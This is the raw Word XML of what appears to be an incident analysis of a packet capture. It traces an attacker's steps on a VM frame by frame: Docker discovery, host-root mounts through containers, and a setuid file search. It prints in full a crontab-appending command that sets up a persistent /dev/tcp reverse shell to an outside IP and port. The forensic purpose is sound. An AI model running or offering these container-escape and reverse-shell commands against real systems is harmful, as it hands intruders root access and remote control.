        <w:t>20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64E4DBE6" w14:textId="4F67DE39" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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r w:rsidR="5BEFAEE5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>env”</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="25667022" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and receives the result of such command</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B8A61" w14:textId="7906C5D9" w:rsidR="3879A9DD" w:rsidRDefault="3879A9DD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This l</w:t>
      </w:r>
      <w:r w:rsidR="55891881" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ists environment variables</w:t>
      </w:r>
      <w:r w:rsidR="3758441C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and finds out that there’s a DOCKER_HOST</w:t>
      </w:r>
      <w:r w:rsidR="4EE90582" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable, which indicates that</w:t>
      </w:r>
      <w:r w:rsidR="78A525D0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, probably, there is a Docker process running on the VM</w:t>
      </w:r>
      <w:r w:rsidR="55891881" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6EDAC" w14:textId="7681F806" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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8</w:t>
      </w:r>
      <w:r w:rsidR="203D7BBE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidR="14513633" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to 16409 </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– 19:</w:t>
      </w:r>
      <w:r w:rsidR="58D99BE3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00173AC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to 19:21 </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A8C152" w14:textId="3BC18CBC" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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r w:rsidR="774B4C0E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="774B4C0E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="764A1828" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check for running docker processes </w:t>
      </w:r>
      <w:r w:rsidR="7A8740F3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(containers) </w:t>
      </w:r>
      <w:r w:rsidR="764A1828" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>but</w:t>
      </w:r>
      <w:r w:rsidR="2F897AAD" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets no result</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58BA49" w14:textId="05C39F77" w:rsidR="303DFB9D" w:rsidRDefault="303DFB9D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Not convinced, decides</w:t>
      </w:r>
      <w:r w:rsidR="0F9A9D2A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="30482A91" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>make an “apt update” and “apt install –y docker.io”</w:t>
      </w:r>
      <w:r w:rsidR="5F29C74F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E125AF3" w14:textId="4856EEF3" w:rsidR="5F29C74F" w:rsidRDefault="5F29C74F" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Repeats the “docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and</w:t>
      </w:r>
      <w:r w:rsidR="4DDF7084" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="02F190AD" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> finds a </w:t>
      </w:r>
      <w:r w:rsidR="453FA647" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F389327" w14:textId="5232CE7D" w:rsidR="061DBF52" w:rsidRDefault="061DBF52" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1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16419 – 19:22 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF36708" w14:textId="3E54BBB1" w:rsidR="061DBF52" w:rsidRDefault="061DBF52" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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r w:rsidR="3BD2E4C6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --rm -t -v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3BD2E4C6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3BD2E4C6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3BD2E4C6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3BD2E4C6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3BD2E4C6"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>”</w:t>
      </w:r>
      <w:r w:rsidR="4FAD23F6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A63DC" w14:textId="5D2ABB93" w:rsidR="4FAD23F6" w:rsidRDefault="4FAD23F6" w:rsidP="1DD92F8E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>The command lists content from the</w:t>
      </w:r>
      <w:r w:rsidR="4A9FBB26" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="28A9D5D8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="4A9FBB26" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="04859D31" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="4A9FBB26" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder </w:t>
      </w:r>
      <w:r w:rsidR="002F3F90" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and removes containers used in the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488A35F3" w14:textId="1772A2C0" w:rsidR="002F3F90" w:rsidRDefault="002F3F90" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr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16429 – 19:22 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1517FCD4" w14:textId="3DC574E7" w:rsidR="48DA617B" w:rsidRDefault="48DA617B" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sends command “docker run --rm -v /:/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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/find 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>/” and receives the same result as “find</w:t>
      </w:r>
      <w:r w:rsidR="3ADC651E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/”</w:t>
      </w:r>
      <w:r w:rsidR="76DACA9C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (containers</w:t>
      </w:r>
      <w:r w:rsidR="79814A4F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidR="76DACA9C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> removed</w:t>
      </w:r>
      <w:r w:rsidR="7BE08C8B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the end</w:t>
      </w:r>
      <w:r w:rsidR="76DACA9C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="4C8AC242" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1FEB8E" w14:textId="00636E36" w:rsidR="4C8AC242" w:rsidRDefault="4C8AC242" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr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24735 – 19:22 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863BC44" w14:textId="7936A999" w:rsidR="4C8AC242" w:rsidRDefault="4C8AC242" w:rsidP="1DD92F8E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Sends command “find </w:t>
      </w:r>
      <w:r w:rsidR="4860B5A0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-perm –400</w:t>
      </w:r>
      <w:r w:rsidR="1DFCA624" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7AC956" w14:textId="2EE8243D" w:rsidR="4C8AC242" w:rsidRDefault="4C8AC242" w:rsidP="1DD92F8E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Finds the same as in frame 8110, but with 2 more </w:t>
      </w:r>
      <w:r w:rsidR="2F096380" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r w:rsidR="5A161B80" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this time:</w:t>
      </w:r>
      <w:r w:rsidR="5433B73E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5433B73E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5B09164C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/lib/dbus-1.0/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5B09164C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dbus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5B09164C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-daemon-launch-helper" and “/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5B09164C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5B09164C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="193F32D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="193F32D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>openssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="193F32D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="193F32D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh-keysign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="193F32D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD6CE8" w14:textId="34EDCAE9" w:rsidR="37368A9E" w:rsidRDefault="37368A9E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr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24745 – 19:23 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48596418" w14:textId="671F9CC8" w:rsidR="37368A9E" w:rsidRDefault="37368A9E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Sends command “</w:t>
      </w:r>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --rm -v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "f=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/crontab', 'a'); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>('*/10 * * * * root 0&lt;&amp;196; exec 196&lt;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t xml:space="preserve">/96.127.23.115/5556; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t xml:space="preserve"> &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196'); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="66261744" w:rsidRPr="1DD92F8E">
        <w:t>(); print('done')" 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="392F8F37" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F942D8" w14:textId="4D5DED4B" w:rsidR="392F8F37" w:rsidRDefault="392F8F37" w:rsidP="1DD92F8E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This command uses docker to execute a python </w:t>
      </w:r>
      <w:r w:rsidR="77D47468" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that opens crontab and adds a</w:t>
      </w:r>
      <w:r w:rsidR="0A840573" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> line at the end of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E067B" w14:textId="5D853ADF" w:rsidR="0A840573" w:rsidRDefault="0A840573" w:rsidP="1DD92F8E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The line added at the </w:t>
      </w:r>
      <w:r w:rsidR="089CD1F9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">end </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of crontab is a persistent reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="7A9ED59B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, this is, a reverse shell that runs every 10 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D75DE36" w14:textId="760D801D" w:rsidR="2D5D6E91" w:rsidRDefault="2D5D6E91" w:rsidP="1DD92F8E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A reverse shell connection works </w:t>
      </w:r>
      <w:r w:rsidR="33C404F5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>like shown in the image that follows</w:t>
      </w:r>
      <w:r w:rsidR="579DC101" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where “Host X” is the VM server and “Server” is the </w:t>
      </w:r>
      <w:r w:rsidR="228BA0D9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="579DC101" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ttacker</w:t>
      </w:r>
